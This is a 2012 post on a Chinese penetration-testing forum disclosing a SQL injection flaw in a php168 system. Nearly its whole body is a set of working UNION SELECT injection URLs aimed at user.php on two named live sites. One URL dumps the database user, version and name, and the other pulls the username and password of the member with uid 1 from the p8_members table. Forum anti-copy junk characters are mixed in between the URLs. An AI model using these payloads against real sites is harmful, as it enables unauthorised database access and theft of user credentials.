找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php168某系统注入漏洞
返回列表 发新帖
查看: 3805|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--: n; H9 Y* ~9 j7 p1 N) n
                                                         
& G/ ^6 _" n$ ~                                       * ~8 P, v/ S  |9 _( K7 _1 L, e

' N9 e- Q7 J2 j. y8 S* G/ X% Chttp://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
. k  P& F. W( x0 s5 K- Q' N0 O2 H: O. A                                                     
8 [7 M- j3 u. Z6 u) G                                                                  
5 i! t! m# T2 e4 ^                                                        ( h+ `" L6 D: V' H7 k
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--1 j5 S& x  k7 s" ^, A9 z5 w  U
7 I: K1 g' S8 a* V: }
# K  v7 i7 J' \" X9 n
* L1 W& `' ?' M* a, t  P
                                                            / X- K; H; L) D1 ?

2 s3 T: M+ A1 e- k, f  Fhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
1 f- b/ l8 s& ?4 Y+ o8 Q9 }( x" e" U5 A* |3 S: B, E
- b* f; E" ~8 k3 Q. y  T! m

( a8 t; R+ M+ g! N- J                                                                    
: z! }% R( ^- I0 w
系统, database, version

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表